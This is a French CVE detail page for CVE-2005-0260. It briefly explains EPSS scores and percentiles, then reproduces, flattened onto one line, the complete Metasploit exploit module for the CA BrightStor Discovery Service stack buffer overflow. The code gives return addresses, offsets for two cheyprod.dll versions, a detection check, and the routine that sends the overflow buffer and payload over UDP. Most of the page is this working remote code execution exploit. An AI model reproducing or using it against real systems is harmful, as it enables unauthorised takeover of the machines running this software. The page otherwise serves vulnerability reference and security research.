CVE-2005-0260 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

## # $Id: discovery_udp.rb 9263 2010-05-09 17:52:51Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Udp def initialize(info = {}) super(update_info(info, 'Name' => 'CA BrightStor Discovery Service Stack Buffer Overflow', 'Description' => %q{ This module exploits a vulnerability in the CA BrightStor Discovery Service. This vulnerability occurs when a large request is sent to UDP port 41524, triggering a stack buffer overflow. }, 'Author' => [ 'hdm', 'patrick' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9263 $', 'References' => [ [ 'CVE', '2005-0260'], [ 'OSVDB', '13613'], [ 'BID', '12491'], [ 'URL', 'http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities'], ], 'Privileged' => true, 'Payload' => { 'Space' => 2048, 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, 'Targets' => [ [ 'cheyprod.dll 12/12/2003', { 'Platform' => 'win', 'Ret' => 0x23808eb0, # call to edi reg 'Offset' => 968, }, ], [ 'cheyprod.dll 07/21/2004', { 'Platform' => 'win', 'Ret' => 0x2380a908, # call edi 'Offset' => 970, }, ], ], 'DisclosureDate' => 'Dec 20 2004', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(41524) ], self.class) end def check # The first request should have no reply csock = Rex::Socket::Tcp.create( 'PeerHost' => datastore['RHOST'], 'PeerPort' => 41523, 'Context' => { 'Msf' => framework, 'MsfExploit' => self, }) csock.put('META') x = csock.get_once(-1, 3) csock.close # The second request should be replied with the host name csock = Rex::Socket::Tcp.create( 'PeerHost' => datastore['RHOST'], 'PeerPort' => 41523, 'Context' => { 'Msf' => framework, 'MsfExploit' => self, }) csock.put('hMETA') y = csock.get_once(-1, 3) csock.close if (y and not x) return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def exploit connect_udp print_status("Trying target #{target.name}...") buf = rand_text_english(4096) # Target 0: # # esp @ 971 # ret @ 968 # edi @ 1046 # end = 4092 buf[target['Offset'], 4] = [ target.ret ].pack('V') buf[1046, payload.encoded.length] = payload.encoded udp_sock.put(buf) udp_sock.recvfrom(8192) handler disconnect_udp end end